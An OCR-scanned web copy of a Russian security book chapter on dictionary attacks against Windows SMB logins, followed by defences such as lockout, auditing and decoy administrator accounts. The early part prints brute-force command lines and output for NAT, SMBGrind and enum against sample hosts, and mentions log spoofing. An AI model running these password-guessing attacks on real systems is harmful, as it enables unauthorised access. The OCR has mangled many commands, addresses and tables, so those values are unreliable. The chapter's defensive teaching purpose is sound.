На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Использование утилиты NAT (NetBIOS Auditing Tool)

Широко распространенная утилита NAT выполняет атаки служб SMB по словарю, прове­ряя один хост за один раз. Она работает через командную строку, поэтому довольно просто может использоваться в сценариях. Утилита NAT связывается с атакуемой системой и пыта­ется подобрать пароли из предопределенного пользователем массива и указанных пользова­телем списков. Один из недостатков утилиты NAT состоит в том, что как только она находит правильные имя пользователя и пароль, что сразу пытается получить доступ к системе с их использованием. Таким образом, поиск остальных паролей для других учетных записей не выполняется. Простой цикл FOR, который периодически повторяет вызов утилиты NAT для подсети класса С, показан наследующем примере (1): Для краткости выведенные данные был и'отредактированы.
D:\>FOR /L %± IN  (1,1,254)  DO nat -u unerlist.txt -p panelist.txt 192.168.202.*i >> nat_output.txt
[»]---       Checking host: 192-168.202.1
[*]---       Obtaining list of remote NetBIOS names
[*]---       Attempting to connect with Username:   'ADMINISTRATOR' Password:
1 ADMINISTRATOR1
I*J---Attempting to connect with Username:   1 ADMINISTRATOR' Password:
'GUEST'
E*l—- CONNECTED:   Username:   'ADMINISTRATOR'   Password:   'PASSWORD'
[*]---        Attempting to access share:   \\*SMBSERVER\TEMP
[-]---        WARNING: Able to access share:   \\*SMBSERVER\TEMP
[*]---Checking write access in:   V\*SMBSERVER\TEMP
[*]---        WARNING:  Directory is writeable:   \\*SMBSERVER\TEMP
[*]---        Attempting to exercise  ..  bug on:   \\*SMBSERVERVTEMP
При использовании качественных списков паролей и имен пользователей утилита NAT стано­вится очень быстрым и эффективным средством подбора паролей. Если была выполнена успешная инвентаризация служб SMB, то легко можно получить список пользователей.
SMBGrind
Утилита NAT бесплатна и обычно хорошо справляется со своим предназначением. Тем, кому нужна мощь коммерческой программы, наверняка интересно будет узнать, что в пакет CyberCop Scanner компании Cyber Network Associates Inc. (NAI) входит утилита под названием
SMBGrind, высокая скорость работы которой обеспечивается за счет выполнений нескольких параллельных процессов. Во всем остальном эта утилита не отличается от программы NAT. Пример отчета утилиты SMBGrind в версии для командной строки показан ниже (2). Значение параметра-1 указывает количество параллельных соединений, т.е. количество параллельных сеансов подбора паролей. Если не указаны параметры -и и -р, утилита SMBGrind по умолчанию использует для подбора паролей файлы NTuserlist. txt HHTpasslist. txt, соответственно.
SMBGrind о подборе пароля
С:\>Hmbgrind -i 132.16В.234.24 -г victim
-и userlist.txt -р pasaliat.txt -1 20 -v
Host address: 192.168.234.240 Userlist :   userlist.txt
Passlist        : passlist.txt Cracking host 192.168.234.240 [victim) Parallel Grinders: 20 Percent complete: 0
administrator administrator administrator administrator
Trying: Trying: Trying: Trying: [etc.] Guessed: Trying: Trying: Trying:
"Percent complete: Trying:
[etc.]
Trying: ejohnson Trying: ejohnson Percent complete: 95 Trying: ejohnson Trying: ejohnson Guessed-, ejohnson Password: Percent complete: 100 Grinding complete,   guessed 2
password adminis tга tor test
administrator Password: joel joel joel 25 joel
administrator
password administrator
test
password
administrator ejohnson ejohnson
accounts
Создание этого отчета заняло меньше секунды, за это время были проверены семь комбина­ций имен пользователей и паролей, что позволяет оценить высокую скорость работы програм­мы SMBGrind. Обратите внимание, что утилита SMBGrind за один сеанс может пытаться по­добрать данные для нескольких учетных записей (здесь были подобраны данные для учетных записей administrator и ejohnson). При этом, даже если пароль был подобран, программа продолжает проверять комбинации до конца списка (как произошло в данном случае с учетной записью Administrator). В результате могут появиться ненужные записи в журнале, так как если пароль найден, то Продолжать проверять другие варианты пароля для этого же пользовате­ля нет смысла. Но утилита SMBGrind, кроме всего прочего, умеет фальсифицировать записи в журналах, в журнале безопасности удаленной системы все попытки входа представляются как попытки входа с рабочей станции //CYBERCOP из домена CYBERCOP, если был включен аудит. Надеемся, что когда-нибудь компания Microsoft обновит службу хсурнала безопасности систем семейства Windows NT, чтобы стало возможным отслеживать IP-адреса.
Параметр -diet программы епшп
Мы представили программу enum в главе 4,, "Инвентаризация", где мы указали о ее воз­можности выполнять атаки по словарю на SMB-Службы. Рассмотрим пример выполнения enum при атаке на систему под управлением Windows 2000 (3).
Листинг 5.3. Атака по словарю с помощью епшп
-D -u administrator -£ Dictionary.txt micaga
username: administrator dietfile: Dictionary, txt server: mirage
(I) administrator \
return 1326, Logon failure: unknown user name or bad password. 12) administrator ] password [etc. J
(10) administrator  | nobody
return 1326, Logon failure: unknown user name or bad password.
(II) administrator J space
return 1326, Logon failure: unknown user name or bad password.
(12) administrator | opensesame /
password found: opensesame
После успешного подбора пароля программа enum прошла успешную аутентификацию ксовместно используемому ресурсу 1РС$. Программа enum выполняет подбор паролей для SMB-служб медленно, но точно (мы наблюдали минимальное количество ошибочных результатов).
Q Меры противодействия подбору паролей


Бюллетень

Нет

BID

Нет

Исправлено в SP

Нет

Фиксируется

Да

■ ■
Лучшее решение для противодействия подбору паролей SMB— заблокировать доступ к службам SMB или отключить их, как описано в главе 4, "Инвентаризация".
На случай, если службы SMB нельзя заблокировать или отключить, ниже мы рассмотрим некоторые другие меры противодействия. Почти все описанные функции доступны из осна­стки Security Policy (Локальная политика безопасности) консоли управления систем Windows Server 2003, которая доступна в элементе Administrative Tools (Администрирование). Более подробно политика безопасности описана в главе 16, "Возможности и средства защиты в системах Windows".
Усложнение пароля (passf ilt)
Нельзя не сказать еше раз о важности выбора сложного, трудного для угадывания пароля, особенно для служб аутентификации систем семейства Windows NT. Всего один ненадежный пароль может стать открытой дверью в сеть организации (а такие пароли попадались нам очень часто). После выпуска Windows NT4 Service Pack 2, в передовой операционной системе компании Microsoft появилась возможность принудительно использовать пароли повышен­ной сложности для отдельных систем или целых доменов. Ранее эта функция называлась passcilt, по названию соответствующей ей библиотеки DLL, а сейчас фильтр паролей можно установить с помощью оснастки Security Policy (Локальная политика безопасности) в разделе Security Settings (Параметры безопасности)1^ Password Policy (Политика паро­лей) активизировав параметр Passwords Must Meet Complexity Requirements (Пароль дол­жен отвечать требованиям сложности), как показано на 1.

SecuitySerraigG - ■ Щ Accoirt Polices
j a Actam Locked I P-S IP Senrty Polcies on
щ] Enforce password rKtay SJMawrrhUfiic^jsvrcrd age Цл[М'гггпл| password age M jhthbii paiSHcrd length
0 paHwcds гегг-н*. 42 days Orlsys 7chaacJen
/"uc. 5./. Включение фильтра паролей для систем Windows Server 2003 повышает требования К сложности пароля
Как и з оригинале программы pass file, после включения этой опции пароли не должны содержать имя пользователя или любую часть его полного имени, они должны будут иметь длину не меньше шести символов, причем эти символы должны относится, как минимум, к трем из перечисленных групп:
▼ латинские прописные буквы (А, В, C...Z);
■ латинские строчные буквы (a, b, c...z);
■ арабские цифры (0, 1, 2...9);
*■ не буквенно-цифровые символы (@, #,!, & и т.д.).
НД ЭДМЕТНУ
Файл passfilt.dll для систем Windows Server2003 не требуется— все делается через описанные установки политики безопасности._
Функция passf ilt имеет два недостатка: ограничение в шесть символов жестко запро­граммировано, а фильтрация паролей производится только при вводе пароля пользовате­лем — администратор все еще может установить легкий для угадывания пароль с помощью консольных утилит, В обход требований функции passfilt. Обе эти проблемы решены в Windows Server 2003. Во-первых, в оснастке Security Policy (Локальная политика безопасно­сти) можно задать минимальную длину пароля (мы рекомендуем использовать пароли дли­ной от семи символов, см. главу 7, "Переход к интерактивному режиму работы"). Во-вторых, фильтр паролей Windows Server 2003 используется во всех случаях изменения паролей, неза­висимо от того, производится ли это действие с консоли или удаленно.
Для более полного соответствия политике паролей в организации можно создать пользо­вательские библиотеки DLL passfilt (см. раздел "Дополнительная литература и ссылки" в конце главы). Остерегайтесь "троянских" программ, так как для взлома системы безопасно­сти библиотека passfilt — просто идеальное место, будьте бдительны при использовании библиотек третьих сторон.
Для критически важных учетных записей наподобие записи администратора или служебных учет­ных записей, мы рекомендуем использовать также непечатаемые символы таблицы ASCII. Тогда под­бор пароля станет невероятно сложным занятием. Эта мера должна быть предпринята в основном для противодействия другим атакам, не связанным С подключением к системе (например подбор пароля), которые подробно будут описаны в главе 7, " Переход к интерактивному режиму работы".
Блокировка учетной записи
Еще один надежный способ борьбы с подбором паролей — включение порога блокировки учетной записи. Когда количество неудачных входов в систему достигнет предельного уста­новленного значения, учетная запись будет на некоторое время заблокирована. На 2
показано, как включить блокировку учетных записей с помощью оснастки Security Policy (Локальная политика безопасности). Если предельное значение срабатывания блокировки не установлено (это должно быть достаточно маленькое значение, мы рекомендуем 5), то подбор пароля будет продолжаться до тех пор, пока взломщику не повезет или пока не закончится сколь угодно большой файл словаря.
Интересно, что система Windows Server 2003 ведет учет неудачных попыток входа в систе­му даже при без установленного порога блокировки учетной записи (такие утилиты, как UserDump, рассмотренная в главе 4, "Инвентаризация", показывают количество неудавших­ся попыток входа в систему и, при возможности, дату последнего неудачного подключения через нулевое сеанс). Если блокировка учетной записи включается позже, то происходит про­верка всех учетных записей и блокируются те, для которых за последние Уминут был превы­шен порог срабатывания (У— время, устанавливаемое при настройке политики блокировки учетных записей). Это более защищенная реализация, поскольку эффект от включения бло­кировки проявляется почти мгновенно, но она может внести некоторое смятение в ряды пользователей, если за указанный промежуток времени были неудачные попытки входа с разными учетными записями (но это весьма маловероятно). Благодарим Эрика Шульца (Eric Schultze) за то, что он обратил наше внимание на данную особенность системы.
Некоторые организации, с которыми мы сотрудничали в качестве консультантов, отказа­лись от установки порога блокировки учетной записи. Дело в том, что разблокировать учет­ную запись могут только члены группы администраторов, а большинство компаний заметили обратную зависимость между низким порогом срабатывания блокировки учетных записей и стоимостью обслуживания пользователей. Поэтому они решили не тратиться так на своих пользователей и обслуживающий персонал. Мы считаем это ошибкой и советуем определить разумное значение для порога блокировки учетных записей, которое бы не сводило с ума об­служивающий персонал. Не забывайте, что даже совершенно абсурдные предельные значе­ния блокировки учетных записей могут предотвратить атаки по словарю (мы видели порог срабатывания блокировки, равный 100 неверным попыткам!). Можно также использовать ав­томатическую блокировку учетных записей через заданный промежуток времени (также на­страивается в Security Policy).
К сожалению, установка порога блокировки учетных записей создает условия для ситуа­ций отказа в обслуживании, которые могут создаваться случайно либо умышленно. Нередко служебные учетные записи оказываются заблокированными после истечения срока действия пароля в домене (случайно), или вредный сотрудник пытается войти в систему от имени кол­лег по работе и (специально) использует неправильные пароли для блокировки учетных запи­сей досаливших ему людей. Пользуйтесь этими параметрами безопасности с осторожностью и учитывайте конкретную ситуацию..
Включение аудита событий неудачных попыток входа в систему
И снова обратимся к оснастке Security Policy (Локальная политика безопасности) и вклю­чим параметры Audit logon events (Аудит входа в систему) и Audit account logon events (Аудит событий входа в систему) как для удачных Success (Успех), так и для неудачных Failure (Отказ) попыток (3).
При минимальных требованиях будут отслеживаться только события неудачного входа в систему, которые помогут определить, что выполняется попытка подбора пароля. Неудач­ные попытки входа в систему будут записываться службой журнала безопасности (Security Log) как Event ID529 (событие неудачного подключения к системе) и Event ID68J (события неудачного входа с учетной записью). Мы более подробно рассмотрим аудит в главе 6, "Расширение привилегий". События "Account locked out" (учетная запись заблокирована) имеют номер Event 1D539. Помните, что журнал регистрации событий (Event Log) отслежива­ет только имя машины NetBIOS, а не ее IP-адрес, ограничивая возможность выявления ис­точника действий по подбору паролей.
НА ЗАМЕТКУ
В системах Windows Server 2003 по умолчанию регистрируется информация обо всех (успешных и неудачных) попытках входа в систему.
Просматривайте журналы!
Помните, что сам по себе аудит событий входа в систему не является эффективным сред­ством защиты от вторжений — журналы необходимо периодически просматривать, чтобы уз­нать о значении созданных записей. В крупных сетях даже ежемесячный просмотр журналов может стать сложнейшей задачей. Выберите утилиты, которые позволят автоматизировать выполнение этой работы. Некоторые рекомендуемые нами программы перечислены далее.
Т Event Log Monitor (ELM) производства компании TNT Software. Программа ELM в реаль­ном времени собирает все записи из журналов в единое хранилище данных. Для прове­дения мониторинга агент программы должен быть установлен на каждой машине.
* EventAdmin производства компании Adita Software. Утилита EventAdmin выполняет поч­ти все те же функции, что и программа ELM, но для ее работы установка агента на ка­ждой машине не требуется.
Заблокируйте настоящую запись администратора и создайте ложную приманку
При проведении атак по подбору паролей особенно "страдает" учетная запись администра­тора. Прежде всего, для нее используется стандартное, широко распространенное имя пользова­теля, и злоумышленники обычно уверены в правильности имени пользователя. Изменение имени этой учетной записи не очень поможет — мы уже показали в главе 4, "Инвентаризация", как при инвентаризации через нулевые сеансы можно выявить настоящее имя учетной записи администратора. Кроме того, учетная запись администратора по умолчанию не блокируется в системах Windows Server 2003, независимо от настройки блокировок учетных записей.
Можно спорить о смысле переименования учетной записи администратора с точки зрения безопасности системы, так как независимо ог имени се всегда можно выявить по .идентификатору SID, если возможно проведение инвентаризации (см. главу4, "Инвентаризация"). Тем не менее, мы рекомендуем сделать это, так как если хакеру не удастся получить дополнительных сведений, безопасность системы после переименования записи администратора несколько повысится.
Более того, мы рекомендуем создать фальшивую учетную запись администратора, которая должна выглядеть, как настоящая. Это даст возможность легко выявлять по журналам прямо­линейные атаки угадывания паролей. Не делайте фальшивую запись администратора членом какой-либо группы, заполните поле с описанием записи соответствующим образом, "Built-in account for administering the computer/domain" ("Встроенная учетная запись для администри­рования компьютера/домена").
Для установки блокировок в пакет NT4 Resource Kit входит утилита passprop, которую можно использовать для блокировки через сеть настоящей учетной записи администратора RID 500 (настоящий администратор всегда сможет войти в систему интерактивно). К сожале­нию, утилита passprop не выполняет свои функции в Windows 2000 без установки Service Pack 2 (хотя кажется, что она работает). Доступна новая версия от Microsoft этой программы, предназначенная для использования в Windows 2000, — она называется admnlock. В системе Windows Server 2003 содержится га же утилита с внесенными исправлениями.
Как показано ниже, установить предельное значение для блокировки учетной записи Administrator с помощью passprop довольно просто,

С: \?рлиаргор /adminloekoufc
Password must be complex
The Administrator account may be locked out except
t    for interactive logons on a domain controller.
Для повышения защищенности после выполнения этой команды нужно вручную забло­кировать учетную запись администратора по сети. Тогда настоящая запись администратора гарантированно станет недоступной для удаленных систем. Если запись администратора пе­реименовать, это еше больше усложнит работу злоумышленников.


Отключите неиспользуемые учетные записи
Во время нашей консультационной работы мы обнаружили, что сложнее всего проник­нуть в те системы, где используется и блокировка, и установка срока действия учетных запи­сей. Контрактные работники, консультанты и временные работники, которых нанимают на Небольшой промежуток времени, должны получать учетные записи, срок действия которых истекает по истечении срока работы человека в организации. Тогда системный администра­тор точно будет знать, что когда временный работник закончит свою работу, ставшая ненуж­ной учетная запись отключится. Это намного надежней, чем ждать несколько месяцев (или же лет, бывает и такое!) сообщения из отдела кадров о том, что учетную запись нужно отклю­чить или удалить. Если контракт работника будет продлен, то учетную запись можно вклю­чить снова на определенный промежуток времени. В системы организаций, где используется такая политика, проникнуть с использованием подбора паролей значительно сложнее, так как в любой конкретный момент времени в системе существует меньше учетных записей, яв­ляющихся потенциальной целью взлома. Более того, удаляются ведь временные учетные за­писи, которые обычно имеют самые слабые пароли!
Истечение срока действия учетной записи устанавливается на контроллерах домена Windows Server 2003 в свойствах учетной записи, на закладке Account (Учетная запись), в поле
Тщательно проверяйте административный персонал
И последний, но не менее важный пункт — при найме на работу людей, которые должны иметь привилегии администратора, проводите строгий отбор. Члены высокопривилегиро­ванных административных групп В системах Windows Server 2003 имеют возможность стирать
дить их становится практически невозможно. Каждому администратору выделите отдельную учетную запись, чтобы иметь возможность отслеживать только его действия. Имя учетной за­писи должно быть сложным для угадывания (а не таким как "admin"). Помните, что пара
"имя пользователя/пароль" учетных записей администраторов — это ключи от вашего коро­левства Windows —относитесь к людям, которые хранят эти ключи, с должным вниманием.
Предотвращение создания общих административных ресурсов
Хотя это и не имеет большого значения, мы должны, по крайней мерс, упомянуть о необ­ходимости предотвращения создания совместно используемых административных ресурсов (С$, ADMINS) э системах Windows 2000 и Windows Server 2003. Злоумышленники обычно про­веряют эти ресурсы с помощью атак подбора паролей, поскольку доступ к этим ресурсам по­зволяет выполнить непосредственное монтирование больших объемов данных с диска. Ниже приведены действия по уничтожению совместно используемых административных ресурсов в Windows Server 2003.
1. Воспользовавшись компонентом панели управления Computer Management в разделе Shared Folder (Общие nanw)oShares (Общие ресурсы), удалите все записи admtn$ и имя_^дисха$.
2. В реестре создайте параметр HKLMXSystemXCurrentControlSetXServicesV LanmanServer\Parameters\AutoShareServer ireg_dword) и установите его значение равным 0.
■ '"'iSrtlti.'i
Будут удалены все административные совместно используемые ресурсы и они не восста­новятся автоматически при последующих перезагрузках системы.
НА ЗАМЕТКУ
Приведенные действия не позволяют удалить совместно используемый ре­сурс 1РС$. Он необходим для работы службы Server и может быть удален только при отключении этой службы.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика